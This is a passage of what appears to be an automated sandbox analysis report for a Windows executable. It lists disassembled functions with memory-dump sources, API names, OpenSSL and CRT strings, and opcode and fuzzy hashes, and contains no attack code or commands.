                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2231116090-0
                                                                                                                                                                                                                            • Opcode ID: b2fedaaf82cc596761f7f70862d0ceb5c57fd5d302ec1c1f2f54fdb3612ddc0f
                                                                                                                                                                                                                            • Instruction ID: 404ab51b1d3408d392ae388f50f80ea283867f4381d95c14fc475967c3a1ee3e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2fedaaf82cc596761f7f70862d0ceb5c57fd5d302ec1c1f2f54fdb3612ddc0f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E001EC11F0A64245FF5A97A6A165BB953919F447C8F4C0632EE3DCA7CEFE2CE4418600
                                                                                                                                                                                                                            Function 00007FF6029A5000 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                            • Opcode ID: b6b6fd321123da95521851cb16ed594db0a84da0c81b575458532337a560e12c
                                                                                                                                                                                                                            • Instruction ID: 0e28f3711433028e44ee642cd4df3a5257ca9fdc99f9fe737d60fdfa3b0427b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6b6fd321123da95521851cb16ed594db0a84da0c81b575458532337a560e12c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C291BD22F08B4685F7619E26D45037D3B91AF40B98FE64136DA5E873D6DEBCE8058380
                                                                                                                                                                                                                            Function 00007FF6029AEA48 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                            • Opcode ID: 45a713974226c8b02de7ab96b89ee31757bb0f036f706dfce3701e360fdcebdc
                                                                                                                                                                                                                            • Instruction ID: 72d1e5538a15584c36a4254803a9f93df8dea58f7770aa694ef0e7c01a719815
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45a713974226c8b02de7ab96b89ee31757bb0f036f706dfce3701e360fdcebdc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F818C32E0834285FB669F2B81542782EB0AF11B4CF758035DA8ED7297DFADE9419781
                                                                                                                                                                                                                            Function 00007FFDFF271D28 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 214COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$R_set_debugX_new$X_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\t1_enc.c$tls1_change_cipher_state
                                                                                                                                                                                                                            • API String ID: 1274617517-2635170098
                                                                                                                                                                                                                            • Opcode ID: a59802dde77d7ce961c2f4c5586033bb6f999abffb3c3bb242a0ad3800f76a06
                                                                                                                                                                                                                            • Instruction ID: 1f5ac3cd97355d0fb4f636a6676b1a3598d3d9e9972738b494b39add335f1a5c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a59802dde77d7ce961c2f4c5586033bb6f999abffb3c3bb242a0ad3800f76a06
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35310332709A8196E3598B26E9A1BAA3790FB48794F540235EE7CC37D5DF3CE161CB00
                                                                                                                                                                                                                            Function 00007FF60299C6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                            • Opcode ID: 2a6de3791725ddfbc48ce0b097b49ba52726105bf73c6c3fd72ab48c7ca6517a
                                                                                                                                                                                                                            • Instruction ID: 81f093f3f65bd810a926666dd8b3d3a616c12d201433f26aca6445a47a118e9c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a6de3791725ddfbc48ce0b097b49ba52726105bf73c6c3fd72ab48c7ca6517a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13517232B196018EDB54CB1BD8446783B95EF48BACF604136EA4D87786DFBDE851C700
                                                                                                                                                                                                                            Function 00007FF60299E2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                            • Opcode ID: 4d1f17f780d541d806ff223e3e5d5e3003fb20f5d45f47d47739065b43184ee8
                                                                                                                                                                                                                            • Instruction ID: 31a13efe2735ce92e3b09208df62a3d08925c81c831a76243bb4fffaee896e2c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d1f17f780d541d806ff223e3e5d5e3003fb20f5d45f47d47739065b43184ee8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 225180329082428EEB64CF1BD4443687B90FF55BA8F245136EA9C87786DFBCE460C701
                                                                                                                                                                                                                            Function 00007FF60299DF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                            • Opcode ID: a61240af1ae5aedb1009d8dd96fdad1026a5f584d89066f28810af8f8e61dc33
                                                                                                                                                                                                                            • Instruction ID: 0e352785b014778ae9065b473606f02c06ee721c2575894ac5bc048d4e410f21
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a61240af1ae5aedb1009d8dd96fdad1026a5f584d89066f28810af8f8e61dc33
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 126162329087C585D774DB1AE4403AABBA0FB85B98F144626EBDD47B56DFBCD1A0CB00
                                                                                                                                                                                                                            Function 00007FFDFF24ACA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_enc.c$ssl3_change_cipher_state
                                                                                                                                                                                                                            • API String ID: 193678381-4073342769
                                                                                                                                                                                                                            • Opcode ID: b7f286f6fd9b16648e400e70dda86b872c0e5a1a4401bebe776399bfb1ee0038
                                                                                                                                                                                                                            • Instruction ID: 19640d25ad28dd12eebf313d937de85fe5fcb304169abb01f6d432854a561746
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7f286f6fd9b16648e400e70dda86b872c0e5a1a4401bebe776399bfb1ee0038
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA01F162B0954159F3019B12AC20FEA6740FB88798F980031EE6CC6AD6EE3CD287C700
                                                                                                                                                                                                                            Function 00007FFDFF2A0F96 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$ossl_statem_client_post_process_message
                                                                                                                                                                                                                            • API String ID: 193678381-2213881910
                                                                                                                                                                                                                            • Opcode ID: 28588e69a9be004c7670403fff7a4f93f1a3905f124f13f4986fd2152f73ee77
                                                                                                                                                                                                                            • Instruction ID: 36e88a4f2873a8dda09630621ad5aa24bb9409c52a71ec95e0ccb513d1252ee2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28588e69a9be004c7670403fff7a4f93f1a3905f124f13f4986fd2152f73ee77
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EF08162B041424BE3489734D872FE97350EB45714F584231DA7DC6ADADE2CE542CB00
                                                                                                                                                                                                                            Function 00007FF602997480 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,?,00007FF60299324C,?,?,00007FF602993964), ref: 00007FF602997592
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                            • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                            • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                            • Opcode ID: 1ca419821233d0601be0ec0fdd22f0615f5bb27aa990e3ab57c5365e74305e49
                                                                                                                                                                                                                            • Instruction ID: d45638a0e549f7fffc32c2255adeb0b49f8667c23f3eed40429705442ca1ac0e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ca419821233d0601be0ec0fdd22f0615f5bb27aa990e3ab57c5365e74305e49
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C31FD61B29AC149FA619B26E4103FA6755FF48BF8F640231EE5D837CADE6CD611C700
                                                                                                                                                                                                                            Function 00007FFDFF241E42 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk_kex_modes
                                                                                                                                                                                                                            • API String ID: 193678381-3633525602
                                                                                                                                                                                                                            • Opcode ID: bedc7f2cf9229473a6431eed86ed2ba14f76d67bc90ca4df0f70c24d59441cda
                                                                                                                                                                                                                            • Instruction ID: dc7866cd875928a06561f34318b2e76e021f749b1f6949de8347d539a88ff30a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bedc7f2cf9229473a6431eed86ed2ba14f76d67bc90ca4df0f70c24d59441cda
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21215E11B1828211F764A712A965BBA67449F85B88F480230ED3DDBACFDE6DED414700
                                                                                                                                                                                                                            Function 00007FFE0CFD23B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878127469.00007FFE0CFD1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFE0CFD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878106458.00007FFE0CFD0000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878147059.00007FFE0CFD3000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878163707.00007FFE0CFD4000.00000004.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878181390.00007FFE0CFD5000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _wassertmemcpy
                                                                                                                                                                                                                            • String ID: hs->curlen < BLOCK_SIZE$src/MD5.c
                                                                                                                                                                                                                            • API String ID: 785382960-3464417081
                                                                                                                                                                                                                            • Opcode ID: 5b6906f2ce9179d28796ded443e0c626bcd02fd7e08f6dda9b73451038638397
                                                                                                                                                                                                                            • Instruction ID: d912130b740e86f5c4baa8af0859339a5855e41e048d49f97a1622cd2dc5eacd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b6906f2ce9179d28796ded443e0c626bcd02fd7e08f6dda9b73451038638397
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43217F61B5869186EB549F19E14437D63A2FF85B8CF188035DE8A17B6ACE3CD8418781
                                                                                                                                                                                                                            Function 00007FFDFF241E56 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$tls_construct_stoc_alpn
                                                                                                                                                                                                                            • API String ID: 0-862372828
                                                                                                                                                                                                                            • Opcode ID: 812ebe87b0cf5cf7d240ba28627a6c2be49b9a584a7a7c81d67cc74ed2d95c10
                                                                                                                                                                                                                            • Instruction ID: 5b9f3554fd9098e352950a558e5cce3591228ca4c066680dfee5058a8983935d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 812ebe87b0cf5cf7d240ba28627a6c2be49b9a584a7a7c81d67cc74ed2d95c10
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78211D50B0814341FBA4A622A931BFA53909F457C8F881235ED7DCB7CBDE6DE9419744
                                                                                                                                                                                                                            Function 00007FFDFF241C8A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
